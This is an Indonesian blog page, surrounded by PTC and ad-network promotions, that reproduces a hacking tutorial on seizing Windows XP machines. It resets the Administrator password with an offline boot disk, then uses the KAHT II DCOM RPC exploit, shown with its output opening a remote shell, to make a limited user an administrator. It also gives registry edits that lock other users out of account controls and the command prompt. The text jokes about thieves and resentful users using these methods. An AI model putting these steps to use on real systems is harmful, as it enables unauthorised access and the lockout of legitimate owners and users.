Page copy protected against web site content infringement by Copyscape

i'am

i'am

Member


SOLUSI FINANSIAL ANDA JANGAN RAGU UNTUK MELAKUKAN DAN BUKTIKAN SENDIRI

DELIOZART

Hi...para blogger mania lam kenal by DeliozART...iseng-iseng saya tulis(tulis apanya...wong contekan smua, hihihihi.....ups da ) apa yang sudah saya lihat & pelajari waktu ge walking arround di Dunia Maya ini. Cuma disinilah duniaku yang penuh inspiratif yang konstruktif(halah sok pake istilah segala...:-P)tiada hari kerjaannya cuman Netter & design doank....(kacian g da temennya, KUPER banget). sebagai Creator DeliozART minta maaf lo da artikel yang mungkin dama dngan blogger lainnya, itu semua saya hanyalah sebagai mediator &tidak bermaksud apa-apa(wah tukang contek bennner ne orang) maklum masih NeWBIE semua ada disini termasuk yang doyan Gratisan silahkan unduh disini sepuasnya...
OK lam PERKOSA MANIA....PERsahabatan KOmpak SelAlu...!!!

Kumpul Blogger

Hey para blogger mania, yuks kumpul bersama pemblogger senior kita untuk berbagi ilmu cara ngblog dan mendapatkan keuntungan yang lumayan,anda bisa mengikuti 5 bisnis sekali gus,

Disini anda bisa menjadi publiser ( pemasang iklan ) pada blogspot, wordperrs, dan friendster anda.

Bisnis ini sama halnya dengan bisnis PPC (pay per klick) lainya, tapi kelebihannya anda bisa sharing ilmu dan silaturahmi dengan para pembisnis internet. sekalian

Ayo buruan daftar di www.kumpulblogger.com secara GRATIS ! Dan dapatkan keuntungannya. Klik aja neh www.kumpulblogger.com jangan lupa sering-sering mampir di blog ne ya hehehehe...

Tekhnik Exploit Password WinXP



Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files
dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10
yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... )
dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS,
yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang,
sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?,
yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee ! Jawab sendiri dah ...

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk
experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) --> untuk disket boot Petter Recovery Password.
Nekatzzzz ....

Kasusnya begini, misalnya ....anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih
menantang ... hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual ... huehueueheue.
Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh ...

Langkah pertama ... Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut ...
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan
secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config,
enter lagi aja untuk yang defaultnya. Setelah itu ....... Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya.
Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP.
Biar gampang melakukan sesuatu nantinya .... hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators
menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan
Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang
berhasil. Sudah ??? ... siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan
di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh ... Edit Completed. Catatan : Setelah menggunakan
Petter Recovery Password,Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ).
Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe... )
Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic,
seperti di windows 98 dulu. Dengan 2 textbox...


-------------------------------------------------
| Log On to Windows | x |
-------------------------------------------------
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA....| |
-------------------------------------------------

Ya, bentuknya kira-kira seperti diatas ... : )...
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan
blankpassword pada Administrator. Ok. Jreng-jreng-jreng... sekarang anda menjadi super user kembali. Silahkan buat account untuk
anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama ... :D, memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang
memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( .
Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???... buka command promptnya ...

C:\Documents and Settings\Al-k>net user

User accounts for \\NOMATTER
-------------------------------------------------------------------------------
Administrator Al-k GNU-- keluarga --
Guest HelpAssistant SUPPORT_388945a0
VUSR_NOMATTER
The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited
// Setelah itu masuk ke direktori di mana kaht berada

D:\Data+ku_>

Kemudian kita test dulu kaht-nya... bisa nggak nih kita nge-root.

D:\Data+ku_>kaht 127.0.0.0 127.0.0.3
_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit. Modified by aT4r@3wdesign.es
#haxorcitos && #localhost @Efnet Ownz you!!!
FULL VERSION? :) - AUTOHACKING
________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads
[+] Attacking Port: 135. Remote Shell at port: 34522
[+] Scan In Progress...
- Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server...
- Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita
buat akses user yang terbatas tadi menjadi Super User.

C:\WINDOWS\system32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki
akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke
regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter.
Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (


// Refferensi :
- Seni Tekhnik Hacking 1 [S’to]
- Echo Zine 10, Exploitasi Windows XP [mRt]
- Iseng Instink
// Greetz :
- y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
- Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
- Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! :)“
- hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
- Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase

0 comments:

BAGI PARA NETTER YANG HOBBY MAEN PTC NIH DIBAWAH UDAH AKU SIAPIN WAT SAHABATKU NUSANTARA JGN LUPA WAT JOIN, MAKASIH...HEHEHEHE....

Mau INCOME tambahan, Join aja di BuxYou.com Instant PTC GRATIS ABIEzzz...

it's me


ShoutMix chat widget

History Kunjungan